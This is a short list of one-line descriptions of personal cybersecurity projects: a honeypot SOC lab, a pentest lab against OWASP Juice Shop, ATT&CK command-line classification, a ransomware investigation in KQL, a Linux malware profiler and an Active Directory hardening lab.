Personal SOC lab using T-Pot CE on AWS to analyze real-world attack telemetry through Honeypots, Suricata, and offline log analysis

Pentest Lab: Recon (Nmap) + DAST (OWASP ZAP baseline/full) against OWASP Juice Shop with reproducible HTML/TXT/PNG evidence and optional SOC correlation.

Command-line (proctitle) classification into MITRE ATT&CK techniques using TF-IDF + Logistic Regression and an LSTM baseline, with a custom token pattern tailored for cyber artifacts (IPs, paths, flags, URLs).

SOC-style ransomware investigation using KQL (Azure Data Explorer)

Behavior-based Linux malware profiler: ptrace syscall tracing → JSONL events → heuristic analysis with IOC extraction & MITRE ATT&CK mapping. No signatures, no hashes

EDR/XDR detection coverage, gaps, and governance considerations for enterprise environments

Enterprise Active Directory security lab focused on privileged access hardening, audit policy configuration, detection engineering, and incident response. Simulates unauthorized privilege escalation attacks with forensic log analysis and MITRE ATT&CK mapping.